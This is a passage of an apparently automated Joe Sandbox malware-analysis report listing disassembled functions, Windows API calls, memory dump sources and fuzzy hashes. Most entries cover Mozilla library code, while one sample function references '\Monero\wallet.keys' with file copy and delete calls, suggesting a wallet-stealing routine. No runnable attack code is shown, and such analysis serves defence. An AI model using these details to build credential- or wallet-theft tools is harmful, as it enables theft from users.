Instruction Fuzzy Hash: 48E08CB0A40208FBC700EBD4DC0AE6977B8EB04702F0040B5FD0987380DA719E248B9A

Function 6C600C90 Relevance: 6.3, APIs: 5, Instructions: 99stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C600CD5

Part of subcall function 6C5EF960: ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6C5EF9A7

strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C600D40
free.MOZGLUE ref: 6C600DCB

Part of subcall function 6C5D5E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C5D5EDB
Part of subcall function 6C5D5E90: memset.VCRUNTIME140(ewal,000000E5,?), ref: 6C5D5F27
Part of subcall function 6C5D5E90: LeaveCriticalSection.KERNEL32(?), ref: 6C5D5FB2

free.MOZGLUE ref: 6C600DDD
free.MOZGLUE ref: 6C600DF2

Memory Dump Source

Source File: 00000000.00000002.1957137509.000000006C5B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5B0000, based on PE: true

Associated: 00000000.00000002.1957123713.000000006C5B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957182154.000000006C62D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957200148.000000006C63E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957319931.000000006C642000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5b0000_file.jbxd

Similarity

API ID: free$CriticalSectionstrlen$EnterImpl@detail@mozilla@@LeaveMutexmemset
String ID:
API String ID: 4069420150-0
Opcode ID: 470b1edd15c3cf4f0b85bc303819d1e3fadbf36495bfdb5080e9303cc359c0d8
Instruction ID: 17830d26badc3db09f61d3c20606839a60d864dcfcd9d756a77065292a24d896
Opcode Fuzzy Hash: 470b1edd15c3cf4f0b85bc303819d1e3fadbf36495bfdb5080e9303cc359c0d8
Instruction Fuzzy Hash: 9B412375A087809BD720DF29C18079AFBE1BFC9714F118A2EE8D897750D770A844CB96

Function 6C60CCF0 Relevance: 6.3, APIs: 4, Instructions: 299COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(000000E0,00000000,?,6C5FDA31,00100000,?,?,00000000,?), ref: 6C60CDA4

Part of subcall function 6C5CCA10: malloc.MOZGLUE(?), ref: 6C5CCA26

Part of subcall function 6C60D130: InitializeConditionVariable.KERNEL32(00000010,00020000,00000000,00100000,?,6C60CDBA,00100000,?,00000000,?,6C5FDA31,00100000,?,?,00000000,?), ref: 6C60D158
Part of subcall function 6C60D130: InitializeConditionVariable.KERNEL32(00000098,?,6C60CDBA,00100000,?,00000000,?,6C5FDA31,00100000,?,?,00000000,?), ref: 6C60D177

?profiler_get_core_buffer@baseprofiler@mozilla@@YAAAVProfileChunkedBuffer@2@XZ.MOZGLUE(?,?,00000000,?,6C5FDA31,00100000,?,?,00000000,?), ref: 6C60CDC4

Part of subcall function 6C607480: ReleaseSRWLockExclusive.KERNEL32(?,6C6115FC,?,?,?,?,6C6115FC,?), ref: 6C6074EB

moz_xmalloc.MOZGLUE(00000014,?,?,?,00000000,?,6C5FDA31,00100000,?,?,00000000,?), ref: 6C60CECC

Part of subcall function 6C5CCA10: mozalloc_abort.MOZGLUE(?), ref: 6C5CCAA2

Part of subcall function 6C5FCB30: floor.API-MS-WIN-CRT-MATH-L1-1-0(?,?,00000000,?,6C60CEEA,?,?,?,?,00000000,?,6C5FDA31,00100000,?,?,00000000), ref: 6C5FCB57
Part of subcall function 6C5FCB30: _beginthreadex.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,00000000,6C5FCBE0,00000000,00000000,00000000,?,?,?,?,00000000,?,6C60CEEA,?,?), ref: 6C5FCBAF

tolower.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,00000000,?,6C5FDA31,00100000,?,?,00000000,?), ref: 6C60D058

Memory Dump Source

Source File: 00000000.00000002.1957137509.000000006C5B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5B0000, based on PE: true

Associated: 00000000.00000002.1957123713.000000006C5B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957182154.000000006C62D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957200148.000000006C63E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957319931.000000006C642000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5b0000_file.jbxd

Similarity

API ID: ConditionInitializeVariablemoz_xmalloc$?profiler_get_core_buffer@baseprofiler@mozilla@@Buffer@2@ChunkedExclusiveLockProfileRelease_beginthreadexfloormallocmozalloc_aborttolower
String ID:
API String ID: 861561044-0
Opcode ID: 96a28910e04c3ba8eb09f8b96a9b5e80d23edb1ac930b8be20879ec5196fa4b5
Instruction ID: 3659562d492526c7edb253dfd148a8770be06d2058d6b99faf23d0315122ad77
Opcode Fuzzy Hash: 96a28910e04c3ba8eb09f8b96a9b5e80d23edb1ac930b8be20879ec5196fa4b5
Instruction Fuzzy Hash: F7D18E71B04B069FD708CF28C580B99F7E1BF89308F01866DD85997712EB71A965CB86

Function 0025D400 Relevance: 6.3, APIs: 4, Instructions: 252filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 0026A740: lstrcpy.KERNEL32(00270E17,00000000), ref: 0026A788

Part of subcall function 0026A9B0: lstrlen.KERNEL32(?,00D49078,?,\Monero\wallet.keys,00270E17), ref: 0026A9C5
Part of subcall function 0026A9B0: lstrcpy.KERNEL32(00000000), ref: 0026AA04
Part of subcall function 0026A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0026AA12

Part of subcall function 0026A8A0: lstrcpy.KERNEL32(?,00270E17), ref: 0026A905

Part of subcall function 00268B60: GetSystemTime.KERNEL32(00270E1A,00D4A4E0,002705AE,?,?,002513F9,?,0000001A,00270E1A,00000000,?,00D49078,?,\Monero\wallet.keys,00270E17), ref: 00268B86

Part of subcall function 0026A920: lstrcpy.KERNEL32(00000000,?), ref: 0026A972
Part of subcall function 0026A920: lstrcat.KERNEL32(00000000), ref: 0026A982

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0025D481
lstrlen.KERNEL32(00000000), ref: 0025D698
lstrlen.KERNEL32(00000000), ref: 0025D6AC
DeleteFileA.KERNEL32(00000000), ref: 0025D72B

Memory Dump Source

Source File: 00000000.00000002.1935243410.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.1935203729.0000000000250000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000301000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000030D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000332000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000033F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000003F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000415000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000049A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.00000000004AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000738000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000747000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935827962.0000000000748000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935928823.00000000008E2000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
String ID:
API String ID: 211194620-0
Opcode ID: 65d75f3719840d0a2d14f7de5adb04dc03ea61a05b248ae24f23efa6acd7313c
Instruction ID: d6cbfe046f57345993c923cc446fe137f5c5dbf9d75b517f0008de10541cb136
Opcode Fuzzy Hash: 65d75f3719840d0a2d14f7de5adb04dc03ea61a05b248ae24f23efa6acd7313c
Instruction Fuzzy Hash: AB91D2729201089BDB04FBA4DD96DEE7338AF24300F504169F517B7091EF346AA9CFA6

Function 6C5D5C50 Relevance: 6.1, APIs: 4, Instructions: 145COMMON

Download Yara Rule

APIs

GetTickCount64.KERNEL32 ref: 6C5D5D40
EnterCriticalSection.KERNEL32(6C63F688), ref: 6C5D5D67
__aulldiv.LIBCMT ref: 6C5D5DB4
LeaveCriticalSection.KERNEL32(6C63F688), ref: 6C5D5DED

Memory Dump Source

Source File: 00000000.00000002.1957137509.000000006C5B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5B0000, based on PE: true

Associated: 00000000.00000002.1957123713.000000006C5B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957182154.000000006C62D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957200148.000000006C63E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957319931.000000006C642000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5b0000_file.jbxd

Similarity

API ID: CriticalSection$Count64EnterLeaveTick__aulldiv
String ID:
API String ID: 557828605-0
Opcode ID: a71b00796af6a081e95ba5952fdc768ca966f7f58168ea35c0710bae7cecc88a
Instruction ID: d270057143cb53b4f4da76c22593b2bfd5a025be29d6c0babdfdb1a35baa1175
Opcode Fuzzy Hash: a71b00796af6a081e95ba5952fdc768ca966f7f58168ea35c0710bae7cecc88a
Instruction Fuzzy Hash: 2D51B0B1F002698FCF18CF6DC884AAEBBB1FB86304F1A5659D815A7750C7306D45CB95

Function 6C5BCDF0 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 128COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,-000000EA,?,?,?,?,?,?,?,?,?,?,?), ref: 6C5BCEBD
memcpy.VCRUNTIME140(?,?,?,?,?,?,?), ref: 6C5BCEF5
memset.VCRUNTIME140(-000000E5,00000030,?,?,?,?,?,?,?,?), ref: 6C5BCF4E

Strings

0, xrefs: 6C5BCF30

Memory Dump Source

Source File: 00000000.00000002.1957137509.000000006C5B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5B0000, based on PE: true

Associated: 00000000.00000002.1957123713.000000006C5B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957182154.000000006C62D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957200148.000000006C63E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957319931.000000006C642000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5b0000_file.jbxd

Similarity

API ID: memcpy$memset
String ID: 0
API String ID: 438689982-4108050209
Opcode ID: c0a996aedf6366ac22bcc70186f2d26821c8eec3c6ea2151966a6e9667986d09
Instruction ID: 484803bfae9e697de906f2b8d727a489b6b88aff35072993989c31071dc9c484
Opcode Fuzzy Hash: c0a996aedf6366ac22bcc70186f2d26821c8eec3c6ea2151966a6e9667986d09
Instruction Fuzzy Hash: 5751F075A00216CFCB01CF18C8A0AAABBA5EF99310F198599E8595F352D735FD06CBE0

Function 00263560 Relevance: 6.1, APIs: 4, Instructions: 124COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1935243410.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.1935203729.0000000000250000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000301000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000030D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000332000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000033F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000003F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000415000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000049A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.00000000004AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000738000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000747000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935827962.0000000000748000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935928823.00000000008E2000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen
String ID:
API String ID: 367037083-0
Opcode ID: e4367d3a86a720b934e4801b6c3c5662ae27197d9039eaaed2e9442b3c9087af
Instruction ID: ff447bc87db24f17e1f88fb7e23901caf6020d280e4057e4116841b16a8c95bd
Opcode Fuzzy Hash: e4367d3a86a720b934e4801b6c3c5662ae27197d9039eaaed2e9442b3c9087af
Instruction Fuzzy Hash: D44153B1D20109EBCB04EFE4D895AEEB778EF54304F008018E41677250DB75AA69CFA6

Function 6C5F6470 Relevance: 6.1, APIs: 4, Instructions: 93COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(00000200,?,?,?,?,?,?,?,?,?,?,?,?,6C5F82BC,?,?), ref: 6C5F649B

Part of subcall function 6C5CCA10: malloc.MOZGLUE(?), ref: 6C5CCA26

memset.VCRUNTIME140(00000000,00000000,00000200,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C5F64A9

Part of subcall function 6C5EFA80: GetCurrentThreadId.KERNEL32 ref: 6C5EFA8D
Part of subcall function 6C5EFA80: AcquireSRWLockExclusive.KERNEL32(6C63F448), ref: 6C5EFA99

ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C5F653F
free.MOZGLUE(?), ref: 6C5F655A

Memory Dump Source

Source File: 00000000.00000002.1957137509.000000006C5B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5B0000, based on PE: true

Associated: 00000000.00000002.1957123713.000000006C5B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957182154.000000006C62D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957200148.000000006C63E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957319931.000000006C642000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5b0000_file.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThreadfreemallocmemsetmoz_xmalloc
String ID:
API String ID: 3596744550-0
Opcode ID: 81d7edaaa396ce6ccecfd2a1251490a9f9cd4ee60ad4cf346448411df9e611ea
Instruction ID: 361c464cb49e8c54b7d4096ae88077d9f491d04b654730d9acea6d853a668ef8
Opcode Fuzzy Hash: 81d7edaaa396ce6ccecfd2a1251490a9f9cd4ee60ad4cf346448411df9e611ea
Instruction Fuzzy Hash: BF31AFB5A043159FCB04DF14D884A9ABBE4FF89314F40882EE85A97741DB30E909CF96

Function 6C5CB4E0 Relevance: 6.1, APIs: 4, Instructions: 54threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6C5CB4F5
AcquireSRWLockExclusive.KERNEL32(6C63F4B8), ref: 6C5CB502
ReleaseSRWLockExclusive.KERNEL32(6C63F4B8), ref: 6C5CB542
free.MOZGLUE(?), ref: 6C5CB578

Memory Dump Source

Source File: 00000000.00000002.1957137509.000000006C5B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5B0000, based on PE: true

Associated: 00000000.00000002.1957123713.000000006C5B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957182154.000000006C62D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957200148.000000006C63E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957319931.000000006C642000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5b0000_file.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThreadfree
String ID:
API String ID: 2047719359-0
Opcode ID: e02cdd6d733e150bf65fc833d3b242cdcd4335bc5a62d2e796e2b369d9d341f5
Instruction ID: 4cc8a0c8f29ae6fe3dcbdc36d1a9320b6b26716040dbde5b8880d724c88a8e61
Opcode Fuzzy Hash: e02cdd6d733e150bf65fc833d3b242cdcd4335bc5a62d2e796e2b369d9d341f5
Instruction Fuzzy Hash: 4911C030A04B41C7D7219F6AD940766B3B0FFD6319F10A74EE84952A03FBB1B5C58B96

Function 00267980 Relevance: 6.1, APIs: 4, Instructions: 51memorytimeCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00270E00,00000000,?), ref: 002679B0
RtlAllocateHeap.NTDLL(00000000), ref: 002679B7
GetLocalTime.KERNEL32(?,?,?,?,?,00270E00,00000000,?), ref: 002679C4
wsprintfA.USER32 ref: 002679F3

Memory Dump Source

Source File: 00000000.00000002.1935243410.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.1935203729.0000000000250000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000301000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000030D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000332000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000033F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000003F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000415000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000049A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.00000000004AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000738000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000747000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935827962.0000000000748000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935928823.00000000008E2000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateLocalProcessTimewsprintf
String ID:
API String ID: 377395780-0
Opcode ID: b27c9b1ef59ace948b0bcb647a2eef72535a65c0edc3245103cd899ddc7f5695
Instruction ID: 1682bde2d0796e0eea9c5aecfbfc5e0250954d946693bf992f5d50b353be970a
Opcode Fuzzy Hash: b27c9b1ef59ace948b0bcb647a2eef72535a65c0edc3245103cd899ddc7f5695
Instruction Fuzzy Hash: 4B1139B2904118ABCB14DFCADD45BBEB7F8FB4CB11F10426AF605A2280E7795950CBB5

Function 6C5F3DE0 Relevance: 6.0, APIs: 4, Instructions: 49COMMON

Download Yara Rule

APIs

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,?,?,?,6C5BF20E,?), ref: 6C5F3DF5
fputs.API-MS-WIN-CRT-STDIO-L1-1-0(6C5BF20E,00000000,?), ref: 6C5F3DFC
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C5F3E06
fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000000A,00000000), ref: 6C5F3E0E

Part of subcall function 6C5ECC00: GetCurrentProcess.KERNEL32(?,?,6C5B31A7), ref: 6C5ECC0D
Part of subcall function 6C5ECC00: TerminateProcess.KERNEL32(00000000,00000003,?,?,6C5B31A7), ref: 6C5ECC16

Memory Dump Source

Source File: 00000000.00000002.1957137509.000000006C5B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5B0000, based on PE: true

Associated: 00000000.00000002.1957123713.000000006C5B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957182154.000000006C62D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957200148.000000006C63E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957319931.000000006C642000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5b0000_file.jbxd

Similarity

API ID: Process__acrt_iob_func$CurrentTerminatefputcfputs
String ID:
API String ID: 2787204188-0
Opcode ID: 2fb623d73efbcd8fea4ea12c9613f6e3730536ecd642ad1ebc4b0eefb50413b6
Instruction ID: e845af7df8567357365fb9ce531222ed671937e86cafd6d868add2045b8ce285
Opcode Fuzzy Hash: 2fb623d73efbcd8fea4ea12c9613f6e3730536ecd642ad1ebc4b0eefb50413b6
Instruction Fuzzy Hash: FDF0FE719002187BE704AB55DC81DAB376DDB86624F040024FE1D57741D735BD158AEB

Function 0026C742 Relevance: 6.0, APIs: 4, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 0026C74E

Part of subcall function 0026BF9F: __amsg_exit.LIBCMT ref: 0026BFAF

__getptd.LIBCMT ref: 0026C765
__amsg_exit.LIBCMT ref: 0026C773
__updatetlocinfoEx_nolock.LIBCMT ref: 0026C797

Memory Dump Source

Source File: 00000000.00000002.1935243410.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.1935203729.0000000000250000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000301000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000030D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000332000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000033F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000003F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000415000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000049A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.00000000004AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000738000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000747000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935827962.0000000000748000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935928823.00000000008E2000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_file.jbxd

Yara matches

Similarity

API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
String ID:
API String ID: 300741435-0
Opcode ID: ade5f0a6083479579b95624e0e8aae91ce9d2769e9f76ae1ca8f7dc12a3ebee4
Instruction ID: a844ff4e531b9c2c8146073113ca1383adeaea04525e985aab98a1e2d5231a19
Opcode Fuzzy Hash: ade5f0a6083479579b95624e0e8aae91ce9d2769e9f76ae1ca8f7dc12a3ebee4
Instruction Fuzzy Hash: CFF090329252119BD723BFB8980676E73A06F00720F304149F558E65E2DF6459E19F56

Function 6C6085B0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 133COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(00000028,?,?,?), ref: 6C6085D3

Part of subcall function 6C5CCA10: malloc.MOZGLUE(?), ref: 6C5CCA26

?_Xlength_error@std@@YAXPBD@Z.MSVCP140(map/set<T> too long,?,?,?), ref: 6C608725

Strings

map/set<T> too long, xrefs: 6C608720

Memory Dump Source

